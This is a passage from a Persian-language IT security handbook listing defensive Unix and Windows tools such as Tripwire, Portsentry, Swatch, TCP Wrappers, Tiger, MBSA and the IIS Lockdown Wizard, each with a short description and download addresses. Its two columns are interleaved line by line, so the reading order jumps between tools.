‫ﺑﺎﺷﻨﺪ ﺭﺍ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﺪ‪ .‬ﻃﻲ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺑﺮﻧﺎﻣـﺔ‬
‫‪Portsentry‬‬ ‫‪ Tripwire‬ﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳـﺪ‪ .‬ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺑﺮﻧﺎﻣـﻪ ﺩﺭ ﻫـﺮ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺗﺪﺍﻓﻌﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﭘـﻮﺭﺕ ﻛـﻪ ﻣﻤﻜـﻦ‬ ‫ﺍﺟﺮﺍﻱ ﺧﻮﺩ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺑﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﺍﻳـﻦ‬
‫ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﻳــﻚ ﺣﻤﻠـﻪ ﺁﻏـﺎﺯ ﺷــﻮﺩ‪ Portsentry .‬ﺭﻭﻱ‬ ‫ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﺧﺮﺍﺑﻴﻬﺎ ﺑﺴﺮﻋﺖ ﻛﺸﻒ ﻭ ﺍﻗـﺪﺍﻣﺎﺕ‬
‫ﭘﻮﺭﺗﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﺪﺓ ‪ TCP/IP‬ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ ﻭ ﺯﻣـﺎﻧﻲ‬ ‫ﻛﻨﺘﺮﻟﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺑﺴﺮﻋﺖ ﺁﻏﺎﺯ ﺷﻮﻧﺪ‪.‬‬
‫ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﻗﺼﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﭘـﻮﺭﺕ‬
‫ﺗﺤﺖ ﻧﻈـﺎﺭﺕ ﺭﺍ ﺩﺍﺭﻧـﺪ‪ ،‬ﻭﺍﺭﺩ ﻋﻤـﻞ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ‬ ‫ﻧﺴﺨﺔ ﺁﺯﺍﺩ ‪ Tripwire‬ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ‪:‬‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﭘﻮﻳـﺸﮕﺮ ﺑـﻪ ﻣـﺴﻴﺮ‬ ‫‪http://www.tripwire.com/ddownloads‬‬

‫‪ ،/etc/host.deny‬ﺍﻓﺰﻭﺩﻥ ﻧﺎﻡ ﺁﻥ ﻣﻴﺰﺑـﺎﻥ ﺑـﻪ ﺿـﺎﺑﻄﺔ ﻣﻨـﻊ‬


‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪Unix‬‬
‫ﻳﻚ ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻏﺮﺑﺎﻝﻛﻨﻨﺪﺓ ﺑﺴﺘﻪ‪ ،‬ﻭ ﻳﺎ ﺍﺟﺮﺍﻱ ﺳﺎﻳﺮ ﺩﺳﺘﻮﺭﺍﺕ‬
‫ﺩﻟﺨﻮﺍﻩ ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺭ ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﻮﺟﻮﺩ ﺍﺳﺖ‪:‬‬ ‫‪Chrootuid‬‬
‫‪http://suorceforge.net/projects/sentrytools/‬‬ ‫‪٥١٣‬‬
‫ﺍﻳﻦ ‪) daemon‬ﻧﻮﺷﺘﺔ ﻭﻳﺘﺰ ﻭﻧﻤـﺎ ( ﺍﺟﺮﺍﻱ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ ﺭﺍ ﺑـﺎ‬
‫‪Swatch‬‬ ‫ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﻛﻢ ﻭ ﺩﺳﺘﺮﺳﻲ ﻣﺤﺪﻭﺩﺷﺪﻩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﻓﺎﻳـﻞ‬
‫‪٥١٤‬‬
‫ﺑﺮﻧﺎﻣﺔ ‪) swatch‬ﻧﻮﺷﺘﺔ ﺗـﺎﺩ ﺍﺗﻜﻴﻨـﺰ ( ﺍﺯ ﺩﺍﻧـﺸﮕﺎﻩ ‪Stanford‬‬ ‫ﺗــﺴﻬﻴﻞ ﻣــﻲﻛﻨــﺪ‪ .‬ﺍﺯ ﺍﻳــﻦ ﺑﺮﻧﺎﻣــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺑــﺮﺍﻱ ﺍﺟــﺮﺍﻱ‬
‫ﻳﻚ ﻧﻈﺎﺭﻩ ﮔﺮ ﺳﺎﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺘﻲ ﻛﻪ ﺗﻮﺳـﻂ‬ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ﻭ ﺳـﺎﻳﺮ ‪daemon‬ﻫـﺎﻱ ﺷـﺒﻜﻪ ﺩﺭ ﻳـﻚ‬
‫ﺑﺮﻧﺎﻣﺔ ‪ syslog‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺭﺍ ﻧﻈﺎﺭﺕ ﻣﻲﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ‬ ‫ﻣﺤﻴﻂ ﻛﻮﭼﻚ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪daemon :‬ﻫﺎ ﻫﺮﻛـﺪﺍﻡ ﺗﻨﻬـﺎ ﺑـﻪ‬
‫ﻛﻪ ﺭﺍﻫﺒﺮ ﺑﺘﻮﺍﻧﺪ ﺩﺭ ﭘﺎﺳﺦ ﺑـﻪ ﻭﻗـﺎﻳﻊ ﺛﺒـﺖﺷـﺪﻩ ﻭ ﻧﻤﻮﻧـﻪﻫـﺎﻱ‬ ‫ﺩﺭﺧﺖ ﺷﺎﺧﻪﻫﺎﻱ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎ ﻳـﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‬
‫ﻣﺨﺘﻠﻒ ﺭﺧﺪﺍﺩﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ )ﻣﺜﻞ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﻫﺸﺪﺍﺭ ﺍﺯ ﻃﺮﻳﻖ ﭘﺴﺖ‬ ‫ﻓﺎﻗﺪ ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﻣﻲﺁﻳﻨﺪ‪ .‬ﺍﻳﻦ ﺗﺮﻛﻴـﺐ‪ ،‬ﻋﻮﺍﻗـﺐ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ‪ ،‬ﻓﺮﺍﺧﻮﺍﻧﺪﻥ ﻳﻚ ﺷﺨﺺ‪ ،‬ﻭ ﻏﻴـﺮﻩ( ﻋﻜﺲﺍﻟﻌﻤـﻞ ﻣﻨﺎﺳـﺒﻲ‬ ‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﻣﺤﺘﻤﻞ ﺩﺭ ‪ daemon‬ﺩﺭ ﺣـﺎﻝ ﺍﺟـﺮﺍ ﺭﺍ ﺑـﻪ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﺪ‪.‬‬ ‫ﺷﺪﺕ ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ‪.‬‬

‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬ ‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬
‫‪http://www.oit.ucsb.edu/~eta/swatch/‬‬ ‫‪ftp://ftp.porcupine.org/pub/security/index.html‬‬
‫‪ftp://ftp.cerias.purdue.edu/pub/tools/unix/log‬‬ ‫‪ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysu‬‬
‫‪utils/swatch/‬‬ ‫‪tils/chrootuid/‬‬

‫‪Tcpwrapper‬‬ ‫‪Portmap‬‬
‫ﺳﻴﺴﺘﻤﻲ )ﻧﻮﺷـﺘﺔ ﻭﻳﺘـﺰ ﻭﻧﻤـﺎ( ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﺮ‬ ‫ﺧﺪﻣﺎﺕ ‪) portmap‬ﻧﻮﺷﺘﺔ ﻭﻳﺘﺰ ﻭﻧﻤﺎ( ﺑﺮﻧﺎﻣﺔ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ‬
‫ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ‪ inetd‬ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻣـﻲﺁﻳـﺪ‬ ‫ﺑﺮﻧﺎﻣﺔ ‪ portmapper‬ﺷﺮﻛﺖ ‪ Sun‬ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ‬
‫ﻧﻈﺎﺭﺕ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻛﻨﻴﺪ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ‬ ‫ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻭ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺩﺭ‬
‫‪ portmapper‬ﺷﺮﻛﺖ ‪ Sun‬ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻨﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺩﺭ‬
‫ﺑﺨﺶ ﺷﺸﻢ‬

‫ﻣﻲﺗﻮﺍﻧﻴـﺪ ﺑـﺼﻮﺭﺕ ﺍﻧﺘﺨـﺎﺑﻲ ﺍﺯ ﺩﺳﺘﺮﺳـﻲ ﻣﻴﺰﺑﺎﻧـﺎﻥ ﺍﻳﻨﺘﺮﻧﺘـﻲ‬


‫ﺧﺎﺻﻲ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﺧـﻮﺩ ﺟﻠـﻮﮔﻴﺮﻱ ﻛﻨﻴـﺪ‪ ،‬ﻭ ﻳـﺎ ﺩﺭ ﻋـﻮﺽ ﺑـﻪ‬ ‫ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻣﺘﻦ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻫﻨﮕﺎﻡ ﺑﺮﻭﺯ ﻣﺸﻜﻞ ﻗﺎﺩﺭ ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ‬
‫ﻣﻴﺰﺑﺎﻧﺎﻥ ﺧﺎﺻﻲ ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﺪﻫﻴﺪ‪.‬‬ ‫ﻛﻪ ﺑﺮﻧﺎﻣﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺩﺭ ﺻﻮﺭﺕ‬
‫ﻟﺰﻭﻡ ﻭﻳﮋﮔﻴﻬﺎﻳﻲ ﺭﺍ ﺑﻪ ﺁﻥ ﺍﺿﺎﻓﻪ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬

‫‪514 Todd Atkins‬‬ ‫‪513 Wietse Venema‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٨٦‬‬

‫ﺍﺿﺎﻓﻪ ﺑﻄﻮﺭ ﺧﺎﺹ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﺧـﺪﻣﺎﺕ ‪ FTP‬ﻧﺎﺷـﻨﺎﺱ‬ ‫‪ftp://ftp.porcupine.org/pub/security/index.html‬‬


‫‪ftp://ftp.cerias.purdue.edu/pub/tools/unix/net‬‬
‫ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ‪.‬‬ ‫‪utils/tcp_wrappers/‬‬

‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬ ‫‪Tiger‬‬


‫‪http://www.wu-ftpd.org‬‬ ‫‪٥١٥‬‬
‫‪ Tiger‬ﻛﻪ ﻧﺴﺨﺔ ﺍﺻﻠﻲ ﺁﻥ ﺗﻮﺳﻂ ﺩﻭﮒ ﺷـﺎﻟﺰ ﺍﺯ ﺩﺍﻧـﺸﮕﺎﻩ‬
‫‪ (TAMU) Texas A&M‬ﻧﻮﺷــﺘﻪ ﺷــﺪﻩ‪ ،‬ﻳــﻚ ﻣﺠﻤﻮﻋــﻪ ﺍﺯ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ‪Windows‬‬
‫ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫـﺎﻳﻲ ﺍﺳـﺖ ﻛـﻪ ﻳـﻚ ﺳﻴـﺴﺘﻢ ‪ Unix‬ﺭﺍ ﺑـﺪﻧﺒﺎﻝ‬
‫ﺿﺪﻭﻳﺮﻭﺱ‬ ‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﭘﻮﻳﺶ ﻣﻲﻛﻨـﺪ‪ Tiger .‬ﺍﺑﺘـﺪﺍ ﺑـﺮﺍﻱ ﻓـﺮﺍﻫﻢ‬
‫ﺿﺪ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺷـﺮﻛﺖ ﺗﻮﻟﻴـﺪ ﻛﻨﻨـﺪﺓ‬ ‫ﻛﺮﺩﻥ ﻳﻚ ﻛﻨﺘﺮﻝ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎﻱ ‪ Unix‬ﺩﺭ ﻣﺤـﻴﻂ ﺩﺍﻧـﺸﮕﺎﻩ‬
‫ﺁﻧﻬﺎ ﺑﺼﻮﺭﺕ ﻣﺪﺍﻭﻡ ﺍﺯ ﻧﺸﺎﻧﻬﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﺷﺪﺓ ﻭﻳﺮﻭﺱ ﺑﺮﺍﻱ‬ ‫‪ A&M‬ﺍﻳﺠﺎﺩ ﺷﺪ‪ ،‬ﭼﻮﻥ ﻛـﺎﺭﺑﺮﺍﻥ ﻧﻴـﺎﺯ ﺩﺍﺷـﺘﻨﺪ ﻛـﻪ ﺑﺘﻮﺍﻧﻨـﺪ ﺍﺯ‬
‫ﭘﺸﺘﻴﺒﺎﻧﻲ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻨﻜﻪ ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ‬ ‫ﺧﺎﺭﺝ ﺩﺍﻧﺸﮕﺎﻩ ﻧﻴﺰ ﺑﺎ ﺳﻴﺴﺘﻢ ﺁﻥ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨﻨـﺪ‪ .‬ﭘـﻴﺶ ﺍﺯ‬
‫ﺿﺪﻭﻳﺮﻭﺱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻤﺘﺮ ﺍﺯ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ ﺍﺯ ﭼـﻪ‬ ‫ﺁﻧﻜﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻏﺮﺑﺎﻝﻛﻨﻨﺪﺓ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻦ ﻣﻨﻈـﻮﺭ ﺗﻐﻴﻴـﺮ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﺿﺪﻭﻳﺮﻭﺳﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﺿﺪﻭﻳﺮﻭﺳـﻬﺎﻱ ﺧـﻮﺏ‬ ‫ﺩﺍﺩﻩ ﺷﻮﻧﺪ‪ ،‬ﺳﻴﺴﺘﻢ ﻣﻲﺑﺎﻳﺪ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺁﺯﻣﻮﻥ ‪ Tiger‬ﺳﺮﺑﻠﻨﺪ‬
‫ﻻ ﺑﺠﺎﻱ ﺍﻳﻨﻜﻪ ﺗﻨﻬﺎ ﻫﻨﮕﺎﻡ ﺩﺭﺧﻮﺍﺳﺖ ﻛـﺎﺭﺑﺮ ﺑـﻪ ﺑﺮﺭﺳـﻲ‬ ‫ﻣﻌﻤﻮ ﹰ‬ ‫ﺑﻴﺮﻭﻥ ﻣﻲﺁﻣﺪ‪ Tiger .‬ﺍﺯ ﺳـﺎﻝ ‪ ۱۹۹۴‬ﺗـﺎ ‪ ۱۹۹۹‬ﺗﻘﺮﻳﺒـﹰﺎ ﻣـﻮﺭﺩ‬
‫ﺁﻟﻮﺩﮔﻴﻬــﺎﻱ ﻧﺎﺷــﻲ ﺍﺯ ﻭﻳﺮﻭﺳــﻬﺎ ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ ،‬ﺑــﺼﻮﺭﺕ ﺑﻼﺩﺭﻧــﮓ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻧﻤﻲﮔﺮﻓﺖ‪ ،‬ﺍﻣﺎ ﻫﻢﺍﻛﻨﻮﻥ ﻣﺠﺪﺩﹰﺍ ﺑﻪ ﺻﻮﺭﺕ ﻓﻌـﺎﻝ‬
‫ﻣﺮﺍﻗﺐ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻭﻳﺮﻭﺳﻬﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺁﻟﻮﺩﻩ ﺑﻪ ﺁﻧﻬﺎ ﻫﺴﺘﻨﺪ‪.‬‬ ‫ﻣﻮﺭﺩ ﭘﺸﺘﻴﺒﺎﻧﻲ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺑﻪﺭﻭﺯ ﻣﻲﺷﻮﺩ‪.‬‬

‫‪٥١٧‬‬ ‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬


‫‪) MBSA‬ﺗﺤﻠﻴﻠﮕﺮ ﺍﻣﻨﻴﺖ ﭘﺎﻳﺔ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ(‬
‫‪http://www. tigersecurity.org‬‬
‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻋﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺮﺭﺳﻲﻛﻨﻨﺪﺓ ﺍﻣﻨﻴﺖ ﺩﺭ ‪Windows‬‬
‫‪ NT‬ﻭ ﺳﻴــﺴﺘﻢﻋﺎﻣﻠﻬــﺎﻱ ﭘــﺲ ﺍﺯ ﺁﻥ ﺍﺳــﺖ‪ .‬ﺍﻳــﻦ ﻧــﺮﻡﺍﻓــﺰﺍﺭ‬ ‫‪Trimlog‬‬
‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺘﻌﺪﺩﻱ ﺭﺍ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﻣﺤﻠﻲ ﻳـﺎ ﺳﻴـﺴﺘﻢ ﺭﺍﻩ ﺩﻭﺭ‬ ‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ )ﻧﻮﺷﺘﺔ ﺩﻳﻮﻳﺪ ﻛﺎﺭﻱ‪ (٥١٦‬ﺑـﺮﺍﻱ ﻛﻤـﻚ ﺑـﻪ ﺭﺍﻫﺒـﺮﺍﻥ ﺩﺭ‬
‫ﺗﺤﺖ ﺭﺍﻫﺒﺮﻱ ﺷﻤﺎ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ؛ ﻣﺜﻞ ﺑﺮﺭﺳﻲ ﺑـﻪﺭﻭﺯ ﺑـﻮﺩﻥ‬ ‫ﻣﺪﻳﺮﻳﺖ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﻃﺮﺍﺣـﻲ ﺷـﺪ‪ .‬ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﻳـﻚ ﻓﺎﻳـﻞ‬
‫ﻭﺻﻠﻪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ‪ ،‬ﺍﺳـﺘﺤﻜﺎﻡ ﺭﻣـﺰ ﻋﺒـﻮﺭ‪ ،‬ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺻـﺤﻴﺢ‬ ‫ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﺗﺎ ﻣﺸﺨﺺ ﺳﺎﺯﺩ ﻛـﺪﺍﻡ ﻓﺎﻳﻠﻬـﺎﻱ‬
‫ﺳﻴﺴﺘﻢ ﻓﺎﻳﻞ‪ ،‬ﻣﻤﻴﺰﻱ ﺗﻨﻈﻴﻤﺎﺕ ﻭﻳﮋﻩ ﺩﺭ ﺑﺮﺧﻲ ﺧـﺪﻣﺎﺕ ﻣﺎﻧﻨـﺪ‬ ‫ﺛﺒﺖ ﺑﺎﻳﺪ ﻫﺮﺱ ﺷﻮﻧﺪ )ﺣﺠﻤﺸﺎﻥ ﻛﻢ ﺷﻮﺩ(‪ ،‬ﭼﮕﻮﻧـﻪ ﺑﺎﻳـﺪ ﻫـﺮﺱ‬
‫‪ IIS‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ ،SQL‬ﻭ ﻏﻴﺮﻩ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﻧﺮﻡﺍﻓـﺰﺍﺭ‬ ‫ﺷﻮﻧﺪ‪ ،‬ﺗﺎ ﭼﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺑﺎﻳﺪ ﻫﺮﺱ ﺷﻮﻧﺪ‪ ،‬ﻭ ﻏﻴﺮﻩ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺑـﻪ‬
‫ﺩﺭ ﺍﻭﻟﻴﻦ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺍﺯ‬ ‫ﺷﻤﺎ ﻛﻤﻚ ﻣﻲﻛﻨﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ ﺁﻧﻘﺪﺭ ﺑﺰﺭﮒ ﺷﻮﻧﺪ ﺗﺎ‬
‫ﺁﺯﻣﻮﻧﻬﺎﻱ ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﻮﻓﻖ ﺑﻴـﺮﻭﻥ ﻧﻴﺎﻳـﺪ‪ ،‬ﻗﺎﻋـﺪﺗﹰﺎ ﺩﺭ ﺁﻳﻨـﺪﻩ‬ ‫ﺗﻤﺎﻡ ﻓﻀﺎﻱ ﺩﻳﺴﻚ ﺭﺍ ﺍﺷﻐﺎﻝ ﻛﻨﻨﺪ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴﺪ‪.‬‬
‫ﺩﭼﺎﺭ ﻣﺸﻜﻞ ﺧﻮﺍﻫﺪ ﺷـﺪ‪ .‬ﺍﻳـﻦ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﺯ ﺁﺩﺭﺱ ﺯﻳـﺮ ﻗﺎﺑـﻞ‬
‫ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ‪:‬‬
‫ﺩﺳﺘﻴﺎﺑﻲ ﺍﺳﺖ‪:‬‬ ‫‪ftp://ftp.cerias.purdue.edu/pub/tools/unix/log‬‬
‫‪http://www.microsoft.com/technet/security/to‬‬ ‫‪utils/trimlog/‬‬
‫‪ols/Tools/mbsahome.asp‬‬
‫‪Wuarchieve ftpd‬‬
‫‪Microsoft IIS Lockdown Wizard‬‬
‫‪ - IIS‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻭﺏ ‪ - Windows‬ﺑﺎﺭﻫﺎ ﻣﻨﺒﻊ ﺗﺨﺮﻳـﺐ‬ ‫ﺍﻳﻦ ‪ daemon‬ﺩﺍﺭﺍﻱ ﻭﻳﮋﮔﻴﻬـﺎ ﻭ ﻗﺎﺑﻠﻴﺘﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺯﻳـﺎﺩﻱ‬
‫ﻭ ﺣﻤﻠﻪ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﻮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﻧﻤـﻲﺧﻮﺍﻫﻴـﺪ ﺁﻧـﺮﺍ‬ ‫ﺍﺳﺖ‪ ،‬ﻣﺜﻞ ﻳﻚ ﻓﺎﻳﻞ ﭘﻴﺎﻡ ﻛﻪ ﻗﺒﻞ ﺍﺯ ﻭﺭﻭﺩ ﻛﺎﺭﺑﺮ ﺑﻪ ﻳﻚ ﺷﺎﺧﻪ‬
‫ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﺎ ‪ Apache‬ﻭ ﻳـﺎ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻭﺏ ﺩﻳﮕـﺮﻱ‬ ‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺍﻭ ﺑـﻪ ﻧﻤـﺎﻳﺶ ﺩﺭﺁﻳـﺪ‪ ،‬ﻗﺎﺑﻠﻴـﺖ ﻣﺤـﺪﻭﺩ ﻛـﺮﺩﻥ‬
